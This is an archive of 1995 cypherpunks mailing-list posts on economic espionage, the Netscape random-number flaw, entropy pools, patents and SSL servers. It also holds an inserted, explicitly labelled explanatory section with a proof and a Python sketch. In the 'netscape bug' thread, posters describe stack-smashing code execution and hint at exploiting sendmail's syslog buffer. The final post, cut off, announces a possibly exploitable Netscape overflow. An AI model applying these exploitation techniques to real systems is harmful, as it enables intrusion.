> >> >new task for the spies.
>
> ah yes, just like the way Clinton alone came up with the whole
> Clipper idea as a way to balance the legitimate goals
> of law enforcement with the right to privacy in society.

Uh, how do you see balancing in the economic intelligence issue? Do you believe espionage is never justified? "Gentlemen don't read each other's mail" almost lost a war.

> careful Bill, your strings are showing. and I won't say
> who is the puppeteer, but he has the initials N.S.A.

You need to write a conspiracy book.

> pardon me, but this new "economic espionage" sleazoid-intelligence-
> agency-justifying bugaboo really annoys me.

You preferred it when they were funding gunrunning and hostage negotiation with drug profits and abetting smuggling?

> I would *die* to see an op-ed in the NYT with the subject:
> "economic espionage: the new bogeyman decoy after the cold war"

Uh, you've not been looking. Many have criticised the new emphasis as justification in a threatless environment.

***

A very interesting note has been published on the subject just recently.
Interested parties might want to check out:

Augustini, Jeff, "From Goldfinger to Butterfinger: The Legal and Policy Issues Surrounding Proposals to Use the CIA for Economic Espionage," 26 Law & Pol'y Int'l Bus. 2 (Law and Policy in International Business, The International Law Journal of Georgetown University Law Center).

While the author misses some key points, goes off on a silly anti-trust tangent which totally misreads the current state of antitrust law, and makes some outright misses on the legal logistics of passing the information through government channels, the work also holds some interesting research about the programs of Japan, France, Germany and Israel.

Some Choice Parts:

'Intelligence officials in the United States estimate that at least twenty foreign nations are currently engaged in intelligence activities "detrimental to our economic interests...."'

'The White House Office on Science and Technology estimates losses to U.S. businesses from foreign economic espionage at nearly one hundred billion dollars per year.'

'Allegations within the French Government accuse U.S. personnel, including four diplomats, attempted to steal secret government documents relating to Franco-American trade disputes.'

'A classified CIA report lists two top Japanese intelligence priorities as (1) intelligence regarding access to foreign sources of raw material and (2) "detailed intelligence on technological and scientific developments in the United States and Western Europe."'

'In addition to intelligence operations abroad, the French are notorious for routinely eavesdropping on, and conducting "bag jobs" against, U.S. businessmen visiting France.
To conduct these "bag job" operations, the French allegedly maintain an extensive network of part-time or volunteer informants known as "honorary correspondents," whose main tasks are to help the DGSE (French Intelligence) gain entry into hotel rooms, delay or distract targets, and provide an early warning system in cases where targets return early... placing electronic eavesdropping equipment on Air France flights between Paris and New York to listen in on traveling U.S. businessmen, attempting to plant moles in European branches of U.S. corporations, and wiretapping state-owned communications lines used by U.S. companies located in France.'

Most interesting for cypherpunks:

An ominous footnote #111 indicates that:

'While many American companies employ encryption equipment, under French law they must give the "keys" to the French government. This allows the French Intelligence services to listen to encoded transmissions.'

If anyone wants a fuller summary, I'll post it to the list with enough interest.

Moral: Even a clueless Law Student comments on intelligence better than "Vlad."

---
"In fact, had Bancroft not existed,            potestas scientiae in usu est
Franklin might have had to invent him."        in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information


From tcmay at got.net Thu Sep 21 19:56:27 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 19:56:27 PDT
Subject: Was the Netscape Flaw Over-Publicized?
Message-ID:

At 4:51 PM 9/21/95, Joe Tardo wrote:
>I can really empathize with what the developers at Netscape must be going
>through, but the 'social good' of raising security flaws to the level of the
>front page of the NYT is hard to deny. Rather than saying "security through
>obscurity is bad" you can point to a precedent of the consequences of being
>found out.

Furthermore, Ian Goldberg's message on Sunday night was a factual, unsensationalized report of something he and Wagner discovered.
The very essence of objective reporting, I thought. That so many reporters found it a newsworthy, even headline-worthy, story is related to other factors.

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."


From jirib at cs.monash.edu.au Thu Sep 21 20:14:06 1995
From: jirib at cs.monash.edu.au (Jiri Baum)
Date: Thu, 21 Sep 95 20:14:06 PDT
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509211852.LAA22259@Csli.Stanford.EDU>
Message-ID: <199509220312.NAA15933@molly.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello stewarts at ix.netcom.com, cypherpunks at toad.com, jsw at netscape.com and Christian Wettergren

Christian Wettergren wrote:
...
> | If I only ever give out a hash of my seed, and only ever *add* any received
> | info to my seed (and stir it in well), how can anyone find out anything?
> | (Apart from hash weaknesses.)
>
> Giving out contribution:
>   MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> Taking in contribution :
>   my_seed = my_seed XOR
>     ((select_low_bits(remote_contrib, contrib_width) << contrib_area)

Hmm, I use:

  taking-in:  seed = MD5(seed,new-data)
  giving-out: MD5(seed)

(where every giving-out is preceded by a taking-in). Is that OK? If not, why not and how can I improve it?

> You also need to keep track of who has contributed what, and how much.
...

Why? I guess to keep track of how much entropy I believe I have...

> This might become a problem if you don't have a safe authentication
> mechanism, like basing the tracking on the IP-numbers etc.
That's a safe authentication mechanism? I don't think so. But you need a secrecy mechanism, so I guess that's where you'd add your auth.

...
> The boot-strap stage is actually the big problem still. But if the
...

The boot-strap is done only once (at install time) so it's not a big problem to ask for lots of random text from user.

...
> | In any case, accepting donations of entropy cannot possibly reduce the
> | amount of entropy I have, can it?
>
> This isn't a problem as I see it, he'll only know what bits he
> flipped, not the actual state.

Good, I thought so.

Sorry, have to go now, rest later...

Jiri
--
PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
-----END PGP SIGNATURE-----


From norm at netcom.com Thu Sep 21 20:18:02 1995
From: norm at netcom.com (Norman Hardy)
Date: Thu, 21 Sep 95 20:18:02 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd)
Message-ID:

At 9:47 PM 9/20/95, Ian Goldberg wrote:
....
> - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way
>        to multiply numbers of the same parity. Can anyone verify this
>        and/or produce a reference?"
....

That trick is probably at least 200 years old. There were once "quarter square" tables published that started

      i   q(i)
    000    000
    001    000
    002    001
    003    002
    004    004
    005    006
    etc.

    q(i) = [i^2/4]

It works for all parities.

    ab = q(a+b) - q(a-b)

These tables were published in nautical navigation books. Mechanical analog computers sometimes used this trick to multiply shaft positions. There would be a cam that computed the square of one angle, expressed as another angle.
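A worked check of the quarter-square identity, added here as an illustration and not part of Norman's post. Writing $q(i) = \lfloor i^2/4 \rfloor$ for the table entries:

$$
(a+b)^2 - (a-b)^2 = 4ab \quad\Longrightarrow\quad \frac{(a+b)^2}{4} - \frac{(a-b)^2}{4} = ab .
$$

The floors do not disturb this, whatever the parities of $a$ and $b$: $a+b$ and $a-b$ differ by $2b$, so they are both even or both odd. If both are even, both squares are multiples of 4 and the floors are exact; if both are odd, $(a+b)^2 \equiv (a-b)^2 \equiv 1 \pmod 4$, so each floor discards the same $\tfrac{1}{4}$ and the difference is unchanged. Hence

$$
q(a+b) - q(a-b) = \left\lfloor \frac{(a+b)^2}{4} \right\rfloor - \left\lfloor \frac{(a-b)^2}{4} \right\rfloor = ab ,
$$

which is exactly Ian's $[(x+y)/2]^2 - [(x-y)/2]^2$. From the table above, $a=3$, $b=2$ gives $q(5) - q(1) = 6 - 0 = 6$, and $a=2$, $b=2$ gives $q(4) - q(0) = 4 - 0 = 4$.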
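As an added example (not code from this thread), a small Python sketch that ties together Norman Hardy's virtual-clock sanity checks from his earlier "Pitfall in producing random numbers" post and the take-in/give-out pool discipline Jiri describes above; SHA-256 stands in for the MD5 named in the thread, and the clock traces, tick counts and bit-crediting are constructed assumptions for the demonstration.

```python
"""Entropy-pool sketch with clock sanity checks.

Added illustration, not code from the thread.  It draws on two earlier posts:
Norman Hardy's checks for a virtual clock masquerading as a real one
(low-order bits, constant differences, elapsed time around a computation of
known length) and Jiri Baum's pool discipline
(take-in: seed = H(seed || data); give-out: H(seed), always after a take-in).
SHA-256 replaces the MD5 named in the thread; the clock traces and tick
counts below are constructed for the demonstration, not measurements.
"""
import hashlib

LOW_BITS = 4     # assumption: how many low-order bits a real clock should exercise
TOLERANCE = 4    # "within a factor of a few" of the expected elapsed time


def clock_looks_virtual(readings, expected_delta):
    """Return a rejection reason if the readings look like a predictable
    (virtual) clock, or None if they pass Hardy's three checks.

    readings:       successive integer clock readings, each pair separated by
                    the same computation of known length
    expected_delta: the tick count that computation should take on real hardware
    """
    if len(readings) < 3:
        return "too few readings"
    mask = (1 << LOW_BITS) - 1
    if all(r & mask == 0 for r in readings):
        return "low-order bits always zero"
    deltas = [b - a for a, b in zip(readings, readings[1:])]
    if len(set(deltas)) == 1:
        return "successive differences are constant"
    for d in deltas:
        if d <= 0 or d > expected_delta * TOLERANCE or d * TOLERANCE < expected_delta:
            return "elapsed time implausible for the computation"
    return None


class Pool:
    """Hash-chained seed pool in the style Jiri describes."""

    def __init__(self, initial_seed):
        self.seed = hashlib.sha256(initial_seed).digest()
        self.credited_bits = 0   # Christian's "who contributed how much", reduced to a total

    def take_in(self, data, credited_bits=0):
        # Mixing is one-way: a contributor learns only what they supplied,
        # not the resulting state, and cannot lower the pool's entropy.
        self.seed = hashlib.sha256(self.seed + data).digest()
        self.credited_bits = min(256, self.credited_bits + credited_bits)

    def give_out(self, fresh_data):
        # Every give-out is preceded by a take-in, so two outputs never repeat.
        self.take_in(fresh_data)
        return hashlib.sha256(self.seed).digest()


def admit_clock_readings(pool, readings, expected_delta, credited_bits=8):
    """Mix clock readings into the pool only if they pass the sanity checks.
    Returns None on success, otherwise the reason they were rejected; the
    caller should then retry or fall back to a user-entered seed, as Hardy suggests."""
    reason = clock_looks_virtual(readings, expected_delta)
    if reason is None:
        pool.take_in(b"".join(r.to_bytes(8, "big") for r in readings), credited_bits)
    return reason


# Constructed traces (assumptions): ticks read around a 12-tick computation.
REAL_CLOCK = [1000, 1013, 1025, 1039]       # jittery, plausible
VIRTUAL_CLOCK = [1000, 1010, 1020, 1030]    # emulator advancing by a fixed step
STALLED_CLOCK = [1000, 1001, 1002, 1004]    # far too little time elapsed
COARSE_CLOCK = [4096, 8208, 12288]          # low nibble never changes

if __name__ == "__main__":
    pool = Pool(b"constructed install-time seed material")
    for name, trace in [("real", REAL_CLOCK), ("virtual", VIRTUAL_CLOCK),
                        ("stalled", STALLED_CLOCK), ("coarse", COARSE_CLOCK)]:
        print(name, admit_clock_readings(pool, trace, 12) or "accepted")
    print(pool.give_out(b"more constructed data").hex())
```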
From ravage at einstein.ssz.com Thu Sep 21 20:22:59 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Thu, 21 Sep 95 20:22:59 PDT
Subject: economic espionage (@#$%^&*) (fwd)
Message-ID: <199509220334.WAA02419@einstein.ssz.com>

Forwarded message:
> Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT)
> From: Black Unicorn
> Subject: Re: economic espionage (@#$%^&*)
>
> > ah yes, just like the way Clinton alone came up with the whole
> > Clipper idea as a way to balance the legitimate goals
> > of law enforcement with the right to privacy in society.
>
> Uh, how do you see balancing in the economic intelligence issue?
> Do you believe espionage is never justified?
> "Gentlemen don't read each other's mail" almost lost a war.
>

All out espionage should, ideally at least, only take place if there is evidence that a nation's independence is directly involved. By this I mean active methods versus passive eavesdropping. It is one thing to send aloft satellites to record cellular traffic between cars and quite another to actively insert agents provocateur.

> 'Intelligence officials in the United States estimate that at least twenty
> foreign nations are currently engaged in intelligence activities
> "detrimental to our economic interests...."'
>

I had hoped they were better investigators than this, only 20? Or perhaps this is a truer indication of our national paranoia.

>
> 'The White House Office on Science and Technology estimates losses to U.S.
> businesses from foreign economic espionage at nearly one hundred billion
> dollars per year.'
>

What are its estimates on what US business gains with its present industrial espionage infrastructure? Without these numbers the quoted above are useless.

Jim


From altitude at cic.net Thu Sep 21 20:23:17 1995
From: altitude at cic.net (Alex Tang)
Date: Thu, 21 Sep 95 20:23:17 PDT
Subject: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To:
Message-ID: <199509220323.XAA09674@petrified.cic.net>

On Thu Sep 21 21:59:00 1995: you scribbled...
>
> In servalan.mailinglist.cypherpunks Tim May writes:
> >Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
> >used and added to, but I can imagine something like this could be done.
>
> As for Web servers, you can
> get the source code for Plexus or CERN httpd off the net. Plus, doesn't
> Eric Young have someone's httpd already hacked to include SSL-compliant
> encryption?

Yes. This has been done. A set of patches for NCSA's HTTPd (for US folks only) can be found at http://petrified.cic.net/~altitude/ssl/howto.html

I got the patches from the ssleay gang in AU, but i haven't seen them on their ftp site yet, so if you're outside the states, it'll be available rsn (i think...)

> The question becomes why don't the free WWW software people out there now
> support crypto? Maybe they're simply not expert in or interested in crypto,
> or maybe they don't want to mess with the ITAR hassles.

Well, I have been trying for the last 3 months to put together a "free" WWW server to both commercial and non-commercial institutions in the states (I'm only concerned about people in the states for now because most of the important issues are moot if you're outside of the states). The main problems that I've run into are:

* Crypto is a difficult topic to understand: I didn't know anything about crypto when i started. It's taken me this long to start understanding the fundamental concepts and such. And i'm still really in the dark about a lot of it.

* Specific information about crypto, (especially licensing and other legal stuff) is difficult to find. Since there are so many patents/trade secrets regarding crypto libraries/algorithms/protocols, any developer MUST deal with the corresponding companies. That process is long and painful.

* Money

There are bound to be legal problems, for example, the RC4 situation.
According to everything I've heard, it is legal to use RC4 because it doesn't have trade secret status anymore. Unfortunately, RSA will most likely bring suit to anyone who tries.

* ITAR

'Nuff said.

As for my plan to "provide" a ssl'ized web server, my plan is to put together a "package" which contains NCSA's HTTPd, SSLeay, and a version of RSARef. I would only charge whatever the licensing costs were to me (There's a minimum $20 cost for the commercial RSARef from Consensus, and I'm still working on the RC4 licensing).

Oh yeah, one other problem is that companies like RSA are completely unaccustomed to dealing with people providing "free" products. For example, At first, RSA kept asking me for a "Business Plan" so that we could work out a percentage royalty that I would pay them for RC4 licensing. They were completely aghast when i said that I wanted to provide it for free. They pointed me to RSARef, but i told them that i wanted to provide it for commercial institutions too, so they asked for business plan, and the cycle continued.... (I've started working with them again, so things are progressing for now...).

I know that I don't really have to go through the RC4 licensing with RSA, but i don't have the money to buy dinner, let alone go head to head with RSA in court.

anyway, if y'all are interested, more info can be found at http://petrified.cic.net/~altitude/ssl/ssl.saga.html. I'd be happy to answer questions, but seeing the knowledge level on the cp list, i feel sort of inferior.

Thanx.

...alex...

Alex Tang  altitude at cic.net  http://petrified.cic.net/~altitude
CICNet:  Unix Support / InfoSystems Services / WebMaster / Programmer
Viz-It!: Software Developer (Check out http://vizit.cic.net)
UM-ITD:  TaX.500 Developer (Check out http://petrified.cic.net/tax500)


From habs at warwick.com Thu Sep 21 20:53:28 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Thu, 21 Sep 95 20:53:28 PDT
Subject: Cypherpunks, Sun and JAVA
Message-ID: <199509220353.XAA02204@cmyk.warwick.com>

Today at the Sun JAVA presentation in NYC.. Sun staff member Hal Stern who was talking about security mentioned Cypherpunks.. when talking about Thomas Jefferson saying roughly that Jefferson would be one if he was alive.

He might read this list (Hi Hal!).

Anyway he gave a good talk on security and actually seemed to be aware of many of the issues.

/hawk

--
Harry Hawk
Manager of Computer Services
Warwick Baker & Fiore
212 941 4438
habs at warwick.com


From jpb at miamisci.org Thu Sep 21 21:04:51 1995
From: jpb at miamisci.org (Joe Block)
Date: Thu, 21 Sep 95 21:04:51 PDT
Subject: Netscape RNG
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I'd like to see the Netscape RNG implemented as a plug-in, preferably with sample source included to make it easier for other people to create compatible plugins. Once there was a published API for the RNG, other apps could use it as well.

I like the option of using a cypherpunks approved RNG. No offense to Netscape, but I'd feel a lot more comfortable using a RNG with say Perry's signature or Matt Blaze's.

jpb

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----


From jpb at miamisci.org Thu Sep 21 21:05:16 1995
From: jpb at miamisci.org (Joe Block)
Date: Thu, 21 Sep 95 21:05:16 PDT
Subject: Miami FL key signing
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I'm interested in setting up a key-signing in the Miami-Ft. Lauderdale area on 28 or 29 October.
Location is flexible, but the date isn't very - a friend of mine is going to be in town from Down Under from some time on the 27th to the morning of the 31st and he'd like to snag as many signatures on his key as possible.

Joseph Block

"The subjection to which the American citizen is now exposed every day of his life is so great that the whole idea of liberty ("That which does not injure one's neighbor") is almost totally lost. The greatest of despots, Louis XIV, never told his subjects what they could or could not eat and drink, and he never told them how to conduct their private lives." -- Jeff Cooper

From sameer at c2.org Thu Sep 21 21:13:39 1995
From: sameer at c2.org (sameer)
Date: Thu, 21 Sep 95 21:13:39 PDT
Subject: Netscape closes up 1 3/8 today!
In-Reply-To:
Message-ID: <199509220408.VAA10258@infinity.c2.org>

> At 1:30 PM 9/21/95, sameer wrote:
> > The only bad publicity is no publicity.
>
> This assumes that you're trying to sell something. Some people actually
> have no use or desire for publicity. Publicity has caused a quick and
> painful death to many scenes, movements, cabals, and "temporary autonomous
> zones."

Yes, this is a good point. If you are trying to sell something, then, the only bad publicity is no publicity. But you are describing cases where -any- publicity is detrimental to the "thing", in which case the publicity, "bad" or "good", is "bad".
--
sameer                         Voice:  510-601-9777
Community ConneXion            FAX:    510-601-9734
An Internet Privacy Provider   Dialin: 510-658-6376
http://www.c2.org (or login as "guest")   sameer at c2.org

From rah at shipwright.com Thu Sep 21 21:18:18 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 21 Sep 95 21:18:18 PDT
Subject: Netscape RNG
Message-ID:

At 12:04 AM 9/22/95, Joe Block wrote:
>I'd like to see the Netscape RNG implemented as a plug-in, preferably
>with sample source included to make it easier for other people to create
>compatible plugins.

This sounds like a job for.... CyberDog!!! Well, OpenDoc, anyway. How 'bout Mozilloids? Any plans for OpenDoc parts in the works? There's talk on micp about making PGP parts...

Cheers,
Bob Hettinga

I know, I know, If you told me, you'd have to kill me...
-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From yihchun at u.washington.edu Thu Sep 21 21:38:47 1995
From: yihchun at u.washington.edu (Yih-Chun Hu)
Date: Thu, 21 Sep 95 21:38:47 PDT
Subject: /dev/audio RNG
In-Reply-To:
Message-ID:

I've been working on a Linux RNG. I'm sure you could port this, but it might take some work for Microsoft based programs...

--- CLIP HERE ---
#!/usr/bin/perl
# Arguments: total random bytes wanted, and "security" = seconds of
# /dev/audio input fed to md5 for each 16 output bytes.
($b,$s)=@ARGV;
$b/=16;                      # one md5 digest (16 bytes) per iteration
open(A,"/dev/audio");
while($b--){
    $t=time;
    $t+=$s||die"Syntax: $0 bytes security\n";
    open(O,"|./md5");        # pipe raw audio samples into md5
    while(time<$t){
        read(A,$x,500);
        print O $x;
    }
    close O;                 # md5 prints the digest of this chunk
}
close A;
print"\n";
# USAGE: rng bytes security
# One external command is used: ./md5 which I created using
#   gcc -O3 -mpentium -o md5 md5.c md5drivr.c
# where md5drivr.c is modified so that MDFilter()'s line printf("\n")
# is commented out.
--- CLIP HERE ---

Runtime = security * (bytes/16) assuming your machine is fast enough. Each set of 16 bytes uses $s seconds of /dev/audio input to create.
I guess you could replace /dev/audio with /dev/mouse. Of course, if you get nothing but d41d8cd98f00b204e9800998ecf8427e you may want to use some other source. :)

+---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun   yihchun at cs.washington.edu  |
| http://weber.u.washington.edu/~yihchun       yihchun at u.washington.edu   |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641  B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79          |
| 2047/DF0403F9  18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC          |
+--------------------------------------------------------------------------+

From perry at piermont.com Thu Sep 21 21:43:51 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 21 Sep 95 21:43:51 PDT
Subject: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220443.AAA02254@frankenstein.piermont.com>

Tom Weinstein writes:
> While it is certainly true that you can stomp on memory in static
> buffers, it's not clear that you can execute whatever code you insert
> there. If the buffer happens to be allocated off the stack (and the
> stack grows down) then you can modify the return address. Of course,
> you have to know the address of whatever code you want to execute.

Let's say, Mr. Weinstein, that you shove some code onto the stack along with the return address, and the address happens to be the code. If you don't believe it can be done, it's easy enough to demonstrate it on your machines, which I believe suffer from the syslog(3) bug, which your company hasn't patched so far as I know, and which afflicts the Sendmail daemons you ship with your machines. See the recent 8lgm bug report if you want details.

> Of course, that also assumes that you can execute from the data area
> which is not always true.
It's usually true on modern machines -- it's very difficult to rig things otherwise given the way that lots of the dynamic loading works these days.

Perry

From unicorn at polaris.mindport.net Thu Sep 21 21:52:19 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 21 Sep 95 21:52:19 PDT
Subject: economic espionage (@#$%^&*) (fwd)
In-Reply-To: <199509220334.WAA02419@einstein.ssz.com>
Message-ID:

On Thu, 21 Sep 1995, Jim Choate wrote:
>
> Forwarded message:
>
> > Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT)
> > From: Black Unicorn
> > Subject: Re: economic espionage (@#$%^&*)
> >
> > > ah yes, just like the way Clinton alone came up with the whole
> > > Clipper idea as a way to balance the legitimate goals
> > > of law enforcement with the right to privacy in society.
> >
> > Uh, how do you see balancing in the economic intelligence issue?
> > Do you believe espionage is never justified?
> > "Gentlemen don't read each other's mail" almost lost a war.
> >
>
> All out espionage should, ideally at least, only take place if there is
> evidence that a nation's independence is directly involved. By this I mean
> active methods versus passive eavesdropping. It is one thing to send aloft
> satellites to record cellular traffic between cars and quite another to
> actively insert agents provocateur.

Not all agents are agents provocateur. Human Intelligence is often required to determine if the criteria you cite above are present.

> > 'The White House Office on Science and Technology estimates losses to U.S.
> > businesses from foreign economic espionage at nearly one hundred billion
> > dollars per year.'
>
> What are its estimates on what US business gains with its present industrial
> espionage infrastructure? Without these numbers the quoted above are
> useless.

The distinction is in the difference between private and government sponsored espionage and intelligence. Most of the French activity is, for example, government sponsored.
As is most of the Japanese activity. U.S. activity is mostly private, by corporations and such. I believe the numbers above are quite helpful really, in identifying scope, and demonstrating a need for counterespionage.

> Jim

---
"In fact, had Bancroft not existed,              potestas scientiae in usu est
Franklin might have had to invent him."          in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From carolann at censored.org Thu Sep 21 21:57:18 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Thu, 21 Sep 95 21:57:18 PDT
Subject: NSCP: Unch..vol rises...morn selling
Message-ID: <199509220457.VAA09524@usr1.primenet.com>

Volume Rose. Morning selling. Afternoon buying. It's now a good bull, bear tussle. I'd sure speculate on the "patch" until tomorrow afternoon. If not there, by 2:00 unload any position. This is a good day trading stock for now. Lots & lots of movement.

Symbol         : NSCP
Exchange       : NASDAQ
Description    : NETSCAPE COMMUNICATIONS CORP COM
Last Traded at : 58 3/4
Date/Time      : Sep 21 4:00
$ Change       : 0
% Change       : 0.000000
Bid            : 58 3/4
Ask            : 59
Volume         : 436900
# of Trades    : 550
Opening Price  : 55
Last Shares    : 5
Day Low        : 54 1/4
Day High       : 59 1/8
52 Week Low    : 45 3/4
52 Week High   : 74 3/4

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org  206.42.112.96
My Homepage  The Cyberdoc
***********************************************************************
http://dcs.ex.ac.uk/~aba/export/

From rjc at clark.net Thu Sep 21 22:12:06 1995
From: rjc at clark.net (Ray Cromwell)
Date: Thu, 21 Sep 95 22:12:06 PDT
Subject: netscape bug
In-Reply-To: <199509220443.AAA02254@frankenstein.piermont.com>
Message-ID:
<199509220511.BAA00235@clark.net>

Maybe I'm missing something here, but I don't see it. While it is easy to use the "overwrite buffer and stomp on stack" method to execute code for programs written as so

void foo(char* inputdata)
{
    char blah[X];
    write_to_buffer_without_knowing_length(inputdata, blah);
}

How would you do it for a program rewritten as

void foo(char* inputdata)
{
    char* blah;
    blah=PMalloc(X);
    write_to_buffer_without_knowing_length(inputdata, blah);
}

Where PMalloc acts like malloc, but from a separate heap. Two other conditions further hold. All variables in this separate heap are viewed as "tainted" since they came from user input, and can not be used as arguments to system(), popen(), fopen(), etc.

Given this, I don't see how it is possible to cause code to be executed. For one thing, you can't modify the stack. Secondly, since buffers can't be used as arguments for i/o calls, overwriting nearby buffers like char *program_path = "auxillary_program" to "/bin/csh" won't do you any good.

(note: a pointer variable should never point to data on the stack anyway. I'm glad Java eliminated stack data. Pointers to stack data are the source of numerous bugs in C. There is a minor performance gain to having the compiler generate the stack allocation rather than call malloc(), but it's not worth it. Stack data has the benefit that it is automatically deallocated upon function return. My answer is to simply use C++ to achieve this with dynamically allocated resources)

I for one, never use scanf(), gets(), or anything that doesn't know the size of the destination storage. It's plain stupid. I was tutoring a student today who had allocated a 20-byte buffer on the stack and used scanf to ask for a filename. Sheesh.

One thing that should set off alarm bells immediately whenever you're coding is a fixed size buffer justified with the idea "no one could ever use more than Y resources." Yeah, no one could ever use more than 11 character file names. 640K ram.
32-bit IP address space. etc, etc. If not for security, then for simple future flexibility.

-Ray

From perry at piermont.com Thu Sep 21 22:19:47 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 21 Sep 95 22:19:47 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <306216B6@hamachi>
Message-ID: <199509220519.BAA02311@frankenstein.piermont.com>

David Van Wie writes:
> > Does this mean that prior art would no longer invalidate a patent?
>
> No. It just moves the prior art date from the date of invention to the date
> of filing the patent application.

Can you explain that? It doesn't make much sense...

.pm

From tomw at orac.engr.sgi.com Thu Sep 21 22:33:41 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 22:33:41 PDT
Subject: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220503.WAA05140@orac.engr.sgi.com>

In article <199509220443.AAA02254 at frankenstein.piermont.com>, "Perry E. Metzger" writes:
> Tom Weinstein writes:
>> While it is certainly true that you can stomp on memory in static
>> buffers, it's not clear that you can execute whatever code you insert
>> there. If the buffer happens to be allocated off the stack (and the
>> stack grows down) then you can modify the return address. Of course,
>> you have to know the address of whatever code you want to execute.

> Let's say, Mr. Weinstein, that you shove some code onto the stack along
> with the return address, and the address happens to be the code.

I never disputed that it could be done, I was just uncertain as to how easy it would be. As has been pointed out, it's not nearly as hard as I thought, assuming you can execute in the stack.
> If you don't believe it can be done, it's easy enough to demonstrate it
> on your machines, which I believe suffer from the syslog(3) bug, which
> your company hasn't patched so far as I know, and which afflicts the
> Sendmail daemons you ship with your machines. See the recent 8lgm bug
> report if you want details.

Hmm, could you explain how to exercise this bug? Perhaps a sample program?

>> Of course, that also assumes that you can execute from the data area
>> which is not always true.

> It's usually true on modern machines -- it's very difficult to rig
> things otherwise given the way that lots of the dynamic loading works
> these days.

True.

--
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  -- Washington DC motto           | tomw at engr.sgi.com

From perry at piermont.com Thu Sep 21 22:38:08 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 21 Sep 95 22:38:08 PDT
Subject: netscape bug
In-Reply-To: <199509220503.WAA05140@orac.engr.sgi.com>
Message-ID: <199509220537.BAA02346@frankenstein.piermont.com>

Tom Weinstein writes:
> > Let's say, Mr. Weinstein, that you shove some code onto the stack along
> > with the return address, and the address happens to be the code.
>
> I never disputed that it could be done, I was just uncertain as to how
> easy it would be.

It's pretty obvious.

> > If you don't believe it can be done, it's easy enough to demonstrate it
> > on your machines, which I believe suffer from the syslog(3) bug, which
> > your company hasn't patched so far as I know, and which afflicts the
> > Sendmail daemons you ship with your machines. See the recent 8lgm bug
> > report if you want details.
>
> Hmm, could you explain how to exercise this bug? Perhaps a sample
> program?

I can tell you in general terms -- I don't write MIPS assembler myself. However, I will point out to you that you use an ancient Sendmail, and that it uses syslog(3) on user produced data, and that syslog uses a static buffer.
Trick sendmail into logging something very big, and you can do what you like. The 8lgm people wrote a demo for Sparc as a proof of concept.

Perry

From jsw at neon.netscape.com Thu Sep 21 23:08:18 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 23:08:18 PDT
Subject: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <43tjr3$ps8@tera.mcom.com>

In article , unicorn at polaris.mindport.net (Black Unicorn) writes:
> On Thu, 21 Sep 1995 anonymous at freezone.remailer.mindport.net wrote:
> > Robert Herrig
> > Peekskill, N.Y., Sept. 19,1995.
> >
> > The writer is a systems consultant.
>
> [For Netscape?]

No.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From rjc at clark.net Thu Sep 21 23:12:30 1995
From: rjc at clark.net (Ray Cromwell)
Date: Thu, 21 Sep 95 23:12:30 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <199509220612.CAA11441@clark.net>

I've found a Netscape bug which I suspect is a buffer overflow and may have the potential for serious damage. If it is an overflow bug, then it may be possible to infect every computer which accesses a web page with Netscape. To see the bug, create an html file containing the following:

